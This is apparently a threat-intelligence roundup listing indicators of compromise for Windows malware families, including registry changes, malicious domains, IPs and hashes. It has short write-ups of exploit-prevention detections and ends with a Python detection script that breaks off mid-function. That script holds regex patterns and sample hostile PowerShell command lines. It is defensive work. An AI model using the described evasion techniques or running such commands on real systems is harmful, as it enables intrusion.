<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: ImagePath | 12
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\jcqwvdjy | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\unbhgouj | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\nguazhnc | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\zsgmltzo | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\yrflksyn | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\dwkqpxds | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\rkyedlrg | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\vocihpvk | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\fymsrzfu | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\mftzygmb | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS, Value Name: C:\Windows\SysWOW64\xqekjrxm | 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
239[.]255[.]255[.]250 | 13
69[.]55[.]5[.]250 | 13
172[.]217[.]3[.]100 | 13
46[.]4[.]52[.]109 | 13
176[.]111[.]49[.]43 | 13
85[.]25[.]119[.]25 | 13
144[.]76[.]199[.]2 | 13
144[.]76[.]199[.]43 | 13
43[.]231[.]4[.]7 | 13
192[.]0[.]47[.]59 | 13
95[.]181[.]178[.]17 | 13
172[.]217[.]197[.]27 | 13
67[.]195[.]228[.]111 | 12
172[.]217[.]10[.]227 | 11
64[.]233[.]186[.]27 | 11
23[.]160[.]0[.]108 | 10
172[.]217[.]5[.]228 | 10
168[.]95[.]5[.]117 | 10
188[.]125[.]72[.]73 | 10
209[.]85[.]203[.]27 | 10
213[.]209[.]1[.]129 | 9
216[.]146[.]35[.]35 | 9
77[.]75[.]78[.]42 | 9
77[.]75[.]76[.]42 | 9
98[.]136[.]96[.]74 | 9
*See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa | 13
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org | 13
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org | 13
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net | 13
whois[.]iana[.]org | 13
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net | 13
whois[.]arin[.]net | 13
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org | 13
microsoft-com[.]mail[.]protection[.]outlook[.]com | 13
honeypus[.]rusladies[.]cn | 13
marina99[.]ruladies[.]cn | 13
sexual-pattern3[.]com | 13
coolsex-finders5[.]com | 13
super-efectindating2[.]com | 13
mta5[.]am0[.]yahoodns[.]net | 12
hotmail-com[.]olc[.]protection[.]outlook[.]com | 11
www[.]google[.]co[.]uk | 11
mx-eu[.]mail[.]am0[.]yahoodns[.]net | 10
video-weaver[.]fra02[.]hls[.]ttvnw[.]net | 10
smtp-in[.]libero[.]it | 9
libero[.]it | 9
eur[.]olc[.]protection[.]outlook[.]com | 9
tiscali[.]it | 9
etb-1[.]mail[.]tiscali[.]it | 9
www[.]ebay[.]com | 9
*See JSON for more IOCs
Files and or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile | 13
%TEMP%\<random, matching '[a-z]{8}'>.exe | 13
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> | 12
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) | 10
%SystemRoot%\SysWOW64\config\systemprofile:.repos | 7
%TEMP%\tsielhm.exe | 1

File Hashes

07cbb12e22655ae68bae25e8aedee6bea64d0d430d77afb86227758740b1dfcd 1ef2f6a958ffc7e4c2733100f10b53baec777d197d345012d464c2e9987cdd43 461f7cb0c6be901935666279cc26d155df22ddffbd4d65372b6ffe9aa3f4ff31 4b57c99f86103e7b26c7bee052f5c5c92c6ac82c34f21ac1b8aa333887a51068 4f734c7197b0c73e62e042cdef1cb4dfb056bc5e144a44ec00f8239796b203a9 564e5e2f864ce52b923daf130c30efd97ba3eab872e04cc8849ed6133ed7abe8 69a09f081ee022239d1b11214da3f6cfc4c256c91c61f806faa71d1997ca31d9 a0738035727d477bae527df884eb986a9c8e6aea75a354782038e3840b6fa3af a2a94ca3039111688fe1304a3fd4ad245b79d0b6d2ce58bcecdcfdb1b34c0208 ad601c1a9bc018b918cbc9eb6c4ccd625f9096c01115a2eb4a7c1387f2bf1d10 afc2ab3eb8b9a23623603c03e7b7d1f0fca18b7b64f33976dd102681eb2a217a b1f1d675c5d97b3ecf4085f1326bf67e5b1ee0b30ed1499df1552283d5fde731 b2ba1ec34c107072d07a962d8ce3fbaefe195969c03be6a3d0dda19aef4665a2

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)

Win.Trojan.Dorkbot-7146944-0

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Znawav | 25
Mutexes | Occurrences
hex-Mutex | 25
s5rBKCUVfOF8JLVi | 25
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
204[.]79[.]197[.]200 | 25
13[.]107[.]21[.]200 | 15
212[.]83[.]168[.]196 | 13
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
api[.]wipmania[.]com | 13
update[.]jebac[.]net | 13
Files and or directories created | Occurrences
%APPDATA%\Znawav.exe | 25
%APPDATA%\Pwoiox.exe | 13

File Hashes

1b7787bd1726468e25ab200665e57b1b470b7ba531d60cee8642646443725cf8 1f2f1041c73af88cc46eb86719cf66e3b51da1c4d7ac70a80cc5b6e7ee4ad73a 20f7f4a0bd9e9e531df4c14276eb290f5cb7efc37156ec9ba46fa2a7891206f1 31012f9ba68cf7e8ac73561fee2c8b2e2a538196d264f3d4c3d89341e77e2495 33f4666ed81d7e61ccdae3a895aa21d670b714727ae68639aeb064f58e387744 39a3a1ccf3c4f36cc72bd45985058d31b02ee345fc844be3b94da5a4c5a03bb6 3d8aa371276f3f11f2640c559dc5edbc792f8126604cb0e8d0ac3c7e521d4f24 4388646391e39334c69e5ff223f0a17d8f3dd11e34921344a30f78772550ca03 4fcf9f3dcd2df360e1069126acd734ded1b43ea7a7dbb5912db0d23eea505bc9 53d77cbc31d6ada99bd858417c8a8ec67907a82e6bc20e8641a3f71cbcfbe4f3 642106449fb781a3f5de12b52b54c97961e61f76160ef8c169bd2b0615e98a2c 738a68fc7864cd87bfaa8336f87b8cdc888fe9fb918de29114b419e2944d29dc 791b43d7009c8bceb849274e51607d89283bddfa94d215ede8cc3bc76953f7a7 a2c072ec77e1736120ff202bfd7f23495921f04375e09fcedc43be1e61ce4a18 a4f42f84cb704690aa10a2ebdce33e964b67a57cee554019d33f1a7cd9d3f4f3 b5bc85bf00d89cc18ffd0749f4783e5c4dd855fa37ce6c37a97ac6e8aa0a10e7 bf1102d0fb6cff725e38c7a6f6ca0e538aebcc546b711f9a2d5fac84fdb981f4 cb95aedf7037adb0c4d756ca1ddb3038341ca20cb276156b782726eff3dfca99 def2ba6dc7842c6b35f09283b68aaa9558e7339ba4b4aa53da83bfed57188ecd e5cbafb8ceee5d6573f199acdff34ab85d2dcd0d0d8e4eb34bd1afed33fe405a ea0479b081905b195d7dc9f37f81cd07945691ab84b395013e2653594e40522e ee10cd27e27378d4ad3f6122168c3e60270031b337e90683481c061d192401f7 ef4abe8f4692c99b8d9bdc30b458d830905e6149ae1ae50bf7eb494f0c8bd229 f31763a353bf7a525e14f500f70c1924948db63d0bde94567dd908917f69133f f71e42635ad5e9c0edac076a736ee15dd705ee119e2d485cb27db7c203bd0e0b

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)

Win.Ransomware.Gandcrab-7145847-0

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: pmoywyfxuah | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: timdnedsfpy | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: gygyxbzlyev | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: faopdrnwmix | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: zpkiquyxsdb | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: lqerbrodiev | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: hspjekelvqt | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: mmdbduldnwd | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: rwsrrtanpih | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: ukyzgbixnjn | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: bnsxxppkywd | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE, Value Name: wuanhvperbe | 1
Mutexes | Occurrences
Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c | 12
\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4 | 10
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
66[.]171[.]248[.]178 | 12
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
ipv4bot[.]whatismyipaddress[.]com | 12
ns1[.]wowservers[.]ru | 12
carder[.]bit | 12
1[.]1[.]168[.]192[.]in-addr[.]arpa | 12
ransomware[.]bit | 12
ns2[.]wowservers[.]ru | 12
1[.]0[.]168[.]192[.]in-addr[.]arpa | 10
Files and or directories created | Occurrences
%APPDATA%\Microsoft\<random, matching '[a-z]{6}'>.exe | 12

File Hashes

067cdd8df478938f229dcedc5f65fd4cf92c66d3c516ba60ae4355d5cfd06a4b 2d6a8bbf44f9459a31692b826a86be3ec55a2fae943b01f1dbfe78bf033ff7ed 32c22604944c7f284fdd4495613bb7d0f7cf274677df9f2d4fb2c38369dba438 4135c6461d7866f9b1841bc7ecbc3e4ff58681e2b80f79e9a7daade0ca014678 72ca8e7098802482b51ba77305cb22d52180444ff2925ed20d8eb1ca0dac5c56 7deada88e32db501dfcfb1aa0b9328c94b8a92561477d01e6b1a3b74e092e56f a10f24291658cec5c7674d2a0a28ce019a69db9af92f3ce8b5b5a8c01c166e5f a2f4c15b34be976d49f35e8363e220f88d59e17ab056b9049d872c6eec04f27f b2526566d9c11b59d36b80c035653ec56a23c5aac8c49c6d7ce3657441e357b2 d2ec413f2c120332e05f71f899094794a9c0092b220ef86633d499bcdcf997ee f8a6408e3a5a75772246c8dba4a39311ef82a5c5e5445fd817375610606bac66 f8d8c881aa3b875216dff9aad38648fe95ad99ee53b3b6652d3172187eded48f

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)

Win.Malware.Phorpiex-7145044-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AntiVirusOverride | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AntiVirusDisableNotify | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: FirewallDisableNotify | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: FirewallOverride | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: UpdatesDisableNotify | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE, Value Name: DisableSR | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: UpdatesOverride | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AutoUpdateDisableNotify | 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Microsoft Windows Driver | 9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Microsoft Windows Driver | 9
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS | 3
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE | 2
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE\RECENT FILE LIST | 2
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE\SETTINGS | 2
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE, Value Name: Blob | 1
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR | 1
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR\RECENT FILE LIST | 1
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR\SETTINGS | 1

Mutexes | Occurrences
5069403 | 5
5070508 | 4
rc/Administrator | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
185[.]176[.]27[.]132 | 9
7[.]5[.]7[.]7 | 9
208[.]100[.]26[.]251 | 7
35[.]225[.]160[.]245 | 7
193[.]32[.]161[.]73 | 5
68[.]178[.]213[.]37 | 1
66[.]218[.]85[.]151 | 1
96[.]114[.]157[.]80 | 1
64[.]136[.]44[.]37 | 1
212[.]227[.]15[.]9 | 1
104[.]47[.]44[.]33 | 1
173[.]194[.]66[.]27 | 1
212[.]54[.]58[.]11 | 1
104[.]47[.]9[.]33 | 1
104[.]47[.]6[.]33 | 1
172[.]217[.]197[.]26 | 1
24[.]201[.]245[.]37 | 1
64[.]98[.]36[.]4 | 1
202[.]137[.]234[.]30 | 1
69[.]168[.]106[.]33 | 1
64[.]8[.]70[.]104 | 1
34[.]212[.]80[.]54 | 1
212[.]227[.]15[.]10 | 1
209[.]17[.]115[.]10 | 1
104[.]20[.]17[.]242 | 1
*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
eguaheoghouughahse[.]top | 9
rzhsudhugugfugugso[.]io | 9
daedagheauehfuuhfp[.]co | 9
aeifaeifhutuhuhuse[.]top | 9
bfagzzezgaegzgfaik[.]su | 9
huaeokaefoaeguaeho[.]io | 9
aeoughaoheguaoehdl[.]cc | 9
gaohrhurhuhruhfsdk[.]su | 9
gaoehuoaoefhuhfugl[.]cc | 9
afaeigaifgsgrhhafo[.]io | 9
befaheaiudeuhughgl[.]cc | 9
aeufuaehfiuehfuhfe[.]top | 9
afaigaeigieufuifie[.]top | 9
aeoughaoheguaoehde[.]top | 9
gaghpaheiafhjefijo[.]io | 9
aegohaohuoruitiiep[.]co | 9
eaeuafhuaegfugeude[.]top | 9
eguaheoghouughahsp[.]co | 9
gaoehuoaoefhuhfugk[.]su | 9
rzhsudhugugfugugse[.]top | 9
afaigaeigieufuifik[.]su | 9
eaeuafhuaegfugeudo[.]io | 9
urusurofhsorhfuuho[.]io | 9
rzhsudhugugfugugsp[.]co | 9
bfagzzezgaegzgfail[.]cc | 9
*See JSON for more IOCs

Files and or directories created | Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp | 10
\autorun.inf | 9
\.lnk | 9
\__\DriveMgr.exe | 9
E:\$RECYCLE.BIN | 9
E:\autorun.inf | 8
E:\__\DriveMgr.exe | 8
E:\.lnk | 8
E:\__ | 8
%APPDATA%\winsvcs.txt | 8
E:\__\$RECYCLE.BIN | 7
E:\__\System Volume Information | 7
%TEMP%\20402.exe | 1
%TEMP%\27375.exe | 1
%TEMP%\14527.exe | 1
%TEMP%\13598.exe | 1
%TEMP%\26079.exe | 1
%TEMP%\25060.exe | 1
%TEMP%\37440.exe | 1
%TEMP%\39807.exe | 1
%TEMP%\10643.exe | 1
%TEMP%\16693.exe | 1
%TEMP%\11927.exe | 1
%TEMP%\29428.exe | 1
%TEMP%\14209.exe | 1
*See JSON for more IOCs

File Hashes

0d338324cf835af918aeb90f63e3d3e96f1f21136005162bff9eb7dff51d5efb 1924bd8e0c2679662f36c52fb7c1acb170e9ad71c55d1b53b70e55f3db71d644 48eac3b34c05886e1338554f54ca7022fa15215dd22d4a6bf62d6c531ba1a3f7 5e1d7375f3e2bb793908e0fa30b5d50e330024be2482f1d6be2c17395bd3b104 65ebf8cd6280fc0c6d3261ecb07e928dec08a6c3a9a814008faeb9053da5485e 6d65ccab03a62d84f12ac21fd02f44805c34696951e3dfb79ca042d8b832cd89 8a60f95d39f7255e1fd83aac66e0d922ca0a235069d7fca74a4ca07aa5ff5f96 c9d8bbeecb57aa0e4f59bad6e574470fe3ff8cc1685f38b16b6fa5435791231f de730a7cf6d436b4e93c0a857cd72074bb2bc1dfd5fda10e25125773711526a9 e0af9dcc27483bcdad52558aa19224a0338343e0456ad1e663e0b42fdd53520f

Coverage

Product | Protection
Amp | This has coverage
Cloudlock | N/A
Cws | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
Wsa | This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Win.Ransomware.Sage-7144073-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER, Value Name: GlobalAssocChangedCounter | 14
<HKCU>\CONTROL PANEL\DESKTOP, Value Name: Wallpaper | 14
<HKCR>\.SAGE | 14
<HKCR>\SAGE.NOTICE\DEFAULTICON | 14
<HKCR>\SAGE.NOTICE\FRIENDLYTYPENAME | 14
<HKCR>\SAGE.NOTICE\SHELL\OPEN\COMMAND | 14
<HKCR>\HTAFILE\DEFAULTICON | 14
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER | 14
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER, Value Name: PendingFileRenameOperations | 14
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS, Value Name: _CommentFromDesktopINI | 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS, Value Name: _LabelFromDesktopINI | 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS | 6
<HKCR>\.SAGE | 1
<HKCR>\SAGE.NOTICE | 1
<HKCR>\SAGE.NOTICE\DEFAULTICON | 1
<HKCR>\SAGE.NOTICE\FRIENDLYTYPENAME | 1
<HKCR>\SAGE.NOTICE\SHELL | 1
<HKCR>\SAGE.NOTICE\SHELL\OPEN | 1
<HKCR>\SAGE.NOTICE\SHELL\OPEN\COMMAND | 1
<HKCR>\HTAFILE | 1
<HKCR>\HTAFILE\DEFAULTICON | 1

Mutexes | Occurrences
zHUoNUQ7 | 14
\BaseNamedObjects\PFShggN3 | 13
\BaseNamedObjects\adX9ZN6Z | 13
\BaseNamedObjects\nkB7lqma | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
5[.]45[.]17[.]36 | 14
5[.]45[.]100[.]133 | 14
5[.]45[.]107[.]161 | 14
5[.]45[.]107[.]167 | 14
5[.]45[.]208[.]36 | 14
138[.]197[.]5[.]51 | 14
138[.]197[.]17[.]156 | 14
138[.]197[.]90[.]36 | 14
138[.]197[.]90[.]40 | 14
138[.]197[.]90[.]60 | 14
138[.]197[.]100[.]51 | 14
138[.]197[.]107[.]13 | 14
138[.]197[.]223[.]99 | 14
139[.]59[.]5[.]191 | 14
139[.]59[.]17[.]80 | 14
139[.]59[.]46[.]45 | 14
139[.]59[.]107[.]91 | 14
139[.]59[.]125[.]8 | 14
139[.]59[.]125[.]154 | 14
139[.]59[.]183[.]4 | 14
139[.]59[.]183[.]170 | 14
139[.]59[.]184[.]137 | 14
139[.]59[.]198[.]12 | 14
139[.]59[.]198[.]48 | 14
139[.]59[.]198[.]116 | 14
*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
mbfce24rgn65bx3g[.]jktew0[.]com | 14
mbfce24rgn65bx3g[.]jpo2z1[.]net | 14

Files and or directories created | Occurrences
%HOMEPATH% | 14
%System32%\Tasks\N0mFUQoa | 14
%TEMP%\__config252888.bat | 14
%APPDATA%\Rj3fNWF3.exe | 14
%APPDATA%\s1qoaKDO.tmp | 14
E:\!HELP_SOS.hta | 14
\!HELP_SOS.hta | 14
%TEMP%\DDx.bmp | 14
%APPDATA%\f1.hta | 14
%HOMEPATH%\Desktop\!HELP_SOS.hta | 14
%HOMEPATH%\Documents\!HELP_SOS.hta | 14
%HOMEPATH%\Documents\Outlook Files\!HELP_SOS.hta | 14
%PUBLIC%\Desktop\!HELP_SOS.hta | 14
%PUBLIC%\Documents\!HELP_SOS.hta | 14
%TEMP%\f1.vbs | 13

File Hashes

0558a89422c627ed31af6d34293b1de99ebd9f8538d8c29bf830b9302dd9aa56 25fd8664218cae1ca68b42245729c6cd00bbf3033704adf66c3ed56604d7e49c 42266cea4387c3bfa085ead6686fb91936a65bf8110c328b4e898771240e7b00 785c3dde4d85cd5ff2e1a826801c3813c2dd08fd547628aaf83bd9baeaf1f9c9 91a103e0a3a93dc681e7de5af18850933d2435a1d6cef35f85e7855f14c3ec02 9dd1839b1090c0467211f689214df91e5eb8e73830f2a2ea9e3408e527fe4096 a462ea6b325c5b91513498401fe7213cee84b61f04278616c51cae7238e57225 adf288cbaea7fadb2b2f152ebccab141a94cccce33d343fd9c5d42bfe65e57eb b238d1eb5e3ef4e3f5c93ead5032ad0bd67716ff555cf1a3649397ad2e3dcaef b5678f253a2c15a3caa25840b16421b4458928d0ddffaf1fb941a4aff1061f38 b61628da0124170e6bfeb5f282da74d06c5a6cffcd05681ce8cd069ec7831404 d59ec8d355d30d035faf50a342e1f1b67b44764db114a373c503098847718db3 d7e794446a774f9f3cacdbd58345a1a52f988eaff24c122800a9aa9b0e094e08 f44c64cc3c06ebb0c2e3333227e82568a14e7cc4400679cd85228f8882f0a416

Coverage

Product | Protection
Amp | This has coverage
Cloudlock | N/A
Cws | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
Wsa | This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


Malware




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (5286)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Madshi injection detected - (2638)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected - (1427)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected - (1081)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Trickbot malware detected - (220)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Gamarue malware detected - (193)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (97)
InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (65)
A PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
PowerShell file-less infection detected - (49)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Dealply adware detected - (30)
DealPly is adware which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on web pages. Adware has also been known to download and install malware.
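The two PowerShell entries above (an excessively long command line, and a script body stored in an environment variable and then run) describe behaviours that can also be checked directly against process-creation telemetry. The following Python script is an added example written for this page, not Cisco AMP code: it takes constructed process-creation events and flags PowerShell launches with an over-long command line, an -EncodedCommand blob, or a script pulled from an environment variable. The event shape, the 1,000-character threshold and the tag names are assumptions to tune for your own environment.

```python
import re

# Constructed sample process-creation events (not real telemetry); "cmdline"
# is the full command line as a process-creation log source would record it.
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Process | Out-File C:\temp\procs.txt"},
    {"pid": 1002, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex $env:xyzzy"'},
    {"pid": 1003, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + "A" * 2400},
    {"pid": 1004, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

# Length threshold in characters: an assumption to tune per environment.
LONG_CMDLINE_THRESHOLD = 1000

POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# Script text handed to Invoke-Expression (or its alias iex) from an environment variable,
# in either operand order: "iex $env:NAME" or "$env:NAME | iex".
ENV_EXEC_RE = re.compile(
    r"\b(iex|invoke-expression)\b[^|]*\$env:\w+|\$env:\w+[^|]*\|\s*(iex|invoke-expression)\b",
    re.IGNORECASE,
)
# -EncodedCommand (and the prefixes PowerShell accepts for it) followed by a long base64 blob.
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{100,}", re.IGNORECASE
)


def image_name(path: str) -> str:
    """Base name of the executable, lower-cased, regardless of slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict) -> list:
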